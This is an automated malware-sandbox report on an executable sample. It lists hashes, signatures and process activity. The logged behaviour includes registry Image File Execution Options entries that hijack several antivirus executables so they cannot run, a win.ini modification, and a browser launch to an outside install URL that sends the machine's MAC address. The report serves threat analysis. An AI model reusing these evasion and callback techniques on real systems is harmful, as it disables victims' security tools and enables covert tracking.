Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
08/07/2024, 03:50
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Resource
win7-20240704-en
windows7-x64
8 signatures
150 seconds
Behavioral task
behavioral2
Sample
2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
Resource
win10v2004-20240508-en
windows10-2004-x64
9 signatures
150 seconds
General
-
Target
2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe
-
Size
45KB
-
MD5
2ae1676267039c16727bf25f624c51a0
-
SHA1
e86fdb3e58645365b4472131790c23de0ec56cb1
-
SHA256
cc91d838372d82e789e05698467ef34d6491d5b6fcf3450a3a16668068374394
-
SHA512
64339d1c89e8f91b088d94d367aa45afa2cb7af429262301e39b065c6b3faca5044fc709ba8aaa5cc169891d75caf78b574c5f370fe7333519bfb237e91331ac
-
SSDEEP
768:rMVvp3w/ZKldEsWiZ0ggt4rbRtoDLtpehEX8bJrcnwSKQdd6Mr2SWxb/zrFJnlQp:rMVvp3w/4SsWs3rsDLtpsJ1XQPrijMko
Score
8/10
Malware Config
Signatures
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RStray.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrRtp.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RStray.exe 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrRtp.exe 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\win.ini 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{093B9A21-3D14-11EF-80D8-CEBD2182E735} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 5027c3e220d1da01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bb7c5835718279428690b074aa627b7000000000020000000000106600000001000020000000aba6e594d31a7501d3c937b0649dffcd17c558aab02dfda54d62691f9c04ba2b000000000e8000000002000020000000990dbb7813230cc7975cb5b4960ca92e3c89f1f4268d1a833f09e94780eeb024900000007b671383a57ac221376a7c260479aeefba055157c4e2021eafe513127fa2833af6ee87667eea94951760ad8d7f104b2f78f1f1c5ad1d9f51af1bbf7eefba6111cb2e811265840480f017f1e0d5107ee7b08791f84e7962d7370b04fae81217c013e7e647a4b414a4bd66ca4b0ecd9191a317bdffc2182fba44b5948741f13af96a9eb37a7271b2f434ffc6c2553678fe400000005e0dddcb031b50d4b0d1451061caa8072a76c83a4c72900b97be0003f3c6217c3f760f7b024fc37931791c7ce268f7f0c0465c73fe2ba13793828f7f0c730c6a iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bb7c5835718279428690b074aa627b7000000000020000000000106600000001000020000000a9a53936731d36f122f0ca32d368c23ac439a6a455a9f0ace4116406857d4c73000000000e8000000002000020000000994eac22f3ac78093de428c290d476fb573bd26d3cd84cc5d50a88a1037007c22000000014f82adad2040c6da429de21afbb990d25bf10a14f896e80420079d97e64fee540000000614015070f0a2f1add96d7b8b8c6204a9b1131cb172959a3416db6fa6b549e490a1a6afd337aba2c3bfc7d636852cd8eacb5c6a7bd4a4d0babbbafa301bff13a iexplore.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1368 iexplore.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1368 iexplore.exe 1368 iexplore.exe 2904 IEXPLORE.EXE 2904 IEXPLORE.EXE 2904 IEXPLORE.EXE 2904 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2296 wrote to memory of 1368 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 30 PID 2296 wrote to memory of 1368 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 30 PID 2296 wrote to memory of 1368 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 30 PID 2296 wrote to memory of 1368 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 30 PID 1368 wrote to memory of 2904 1368 iexplore.exe 31 PID 1368 wrote to memory of 2904 1368 iexplore.exe 31 PID 1368 wrote to memory of 2904 1368 iexplore.exe 31 PID 1368 wrote to memory of 2904 1368 iexplore.exe 31 PID 2296 wrote to memory of 1300 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 21 PID 2296 wrote to memory of 1300 2296 2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe 21 PID 1368 wrote to memory of 2248 1368 iexplore.exe 33 PID 1368 wrote to memory of 2248 1368 iexplore.exe 33 PID 1368 wrote to memory of 2248 1368 iexplore.exe 33 PID 1368 wrote to memory of 2248 1368 iexplore.exe 33
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1300
-
C:\Users\Admin\AppData\Local\Temp\2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\2ae1676267039c16727bf25f624c51a0_JaffaCakes118.exe"2⤵
- Event Triggered Execution: Image File Execution Options Injection
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\program files\internet explorer\iexplore.exe"C:\program files\internet explorer\iexplore.exe" "http://www.qqqt8.cn/bw/install.asp?ver=081129&tgid=huiqu&address=CE-BD-21-82-E7-35®k=1&flag=8895437f50e74f5479b26009b0c74aee&frandom=5035"3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1368 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2904
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1368 CREDAT:4142087 /prefetch:24⤵PID:2248
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e0d57d309318d80e9ea156f13043d6a7
SHA151c613cc1727e7d710d72e975d8499490687501f
SHA25655f1a810337998bff9f78e873cd2658b1e216e137439d3e0e0d61fdec89290e0
SHA5124b7c50c10f3aa6ca007d7c05ecb68b30d2121c9e080ee8279404e6c45744bf63c6abe6a4da4ef87c93323d78e45ca1347eb482abb00f4681573ac9935831cf64
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD56d56eb6b8c3bc6e688a1518aeceb8891
SHA1532e263ce3a0521f69874687435b76e42c96e4e0
SHA256322432ed2bcf6b9f257bce76fabaa32c9434e11fdea3db659c763c6035960fb3
SHA5126517c21fdd466bfdf33d5ab238cab60e5307ea1bcd516adee0eb3e4d35021538146d0a4f2e9d9e04dfa34c4fc6e315e2c287d6525f5fe8e80fbdcf86aeaa01dc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD509063d3692ace5e7ef4c80426ae95e90
SHA1ed2adec43e291545670e2046742485fc62045e22
SHA256d65d45b327afb49f6c4d60996bef8f2240e2dd672eb513b37f8e413be19cfb74
SHA51212ddfd9817273be7ae75042763e8e43fe18e2b4df488b2f89588677ab802fbab748b55f4d320c01dca8332a502bba4f4f4a93329a9dc1a49954fcb417710d7ca
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD58579503d312f83c033e03b5621a1313b
SHA117295269ead1a235612932924ad48e2b0c8037cb
SHA2562b97588ea216cbe1acb7989834181cf89d864256dac730516995099007e4d210
SHA512750738cf2ea6e9f23082758d78b45291308e6a9650392efc26b2b5021764ad025cbb5f591f1e84fadd8a1f6a1e56e6c12b0a5a4e12f55c610ca7011616ffad2b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD59a0ac6c234c4ba3404298b8be7f17177
SHA1d582cbb41a6e2c8c874e79410700c8a906faa0e5
SHA256cdcfd71e9ad493d55e40c5f2a51fd000dddcc2f1cd798a3561b87c6ec836c6d5
SHA512b17e4dbde539322fc4965049c5bf923f63ea4b252358ccade312411e1df5e90d9d0b935896795b2c072fccd21e596599854d6ba60bce21d7c2414226629c43c7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e80075edafd889eb09f73441bfd6b9f2
SHA1d372499f3b57e5ea862b27ee9eb73cc58df48bd8
SHA256a5b0ba292474380e1cf2bafcacb5ab5439821e9e3e4eb66d753e9860819dd2b0
SHA512ae626c51249b0025f299e1285b2d673ee5151a39abcabfeaa6c1a154b0428b1803ad8d2884eb35b5162cd6abcf088884a2682e2dccf23c0a47e3ff01cf67ef88
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5d82b4a047ad5364bbe4c65097d6a11cb
SHA148a9648d12ddad3766b68c6ffb2ad971c5d61ecb
SHA2563aa00771a2a62daf0e46b575ec3e265c5aebdacfecb67a534247d15ee593baba
SHA5126ff6e41ec7c0ed10ec156d82ed76b90c892d5b300ae5c4fc97640e7c71c81df64eed5fe66031586bd68d19ceef2a5d8506df65b2b684b97924fa237282d416d5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5cddff437127d0c6356ce22930a8c7ff3
SHA1e84a110ec9d11ec96ff2ea99e4c6760b6f8f53cf
SHA256c9fd431aca584348966511c351682b477d81d3b1c38237c61b9eee84ee4f55c5
SHA512ed2624c0e559e854385871bed1675075eb16c0a9e243421c9529b5b21213fd472a932c414374698d2b5e51d656487896dd0c7a168725bcc7f9a57d8a5f66da57
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5a8462c4bbfe8f14b32c43e139fa23fd2
SHA18a1253aea01789c6980a74d62dec296c9dee64f2
SHA256ccb3d57793283c60c2b3f559534c3eb2262b839e1495f0dc1848423368bf9be7
SHA5120623cf2c9e409cbb671204185c6c609b438ec84d483ea3cd429dbe1f56b73b9d31c947f8911521ca2c76c731ff4d0edf0b76c7db20a443a99dd21bc7cf465937
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
16KB
MD5c81638cbafbedae275a900b540b80656
SHA1dcd195f08c84c4629e7c01d4eeacad8170a51ca2
SHA256058965f656f41cc7dcb273e7693a9ffe0a12bf7fdb2221d756647f2ce967eb21
SHA512aa1123beff378cd5cc00371cd229ebbc28081da410f76cc42fb4b97d388996f078f5f4cdfb9a4991c36dc1c473d50ff75e4d5c8b6c654cdfa2d57097d4ff9d85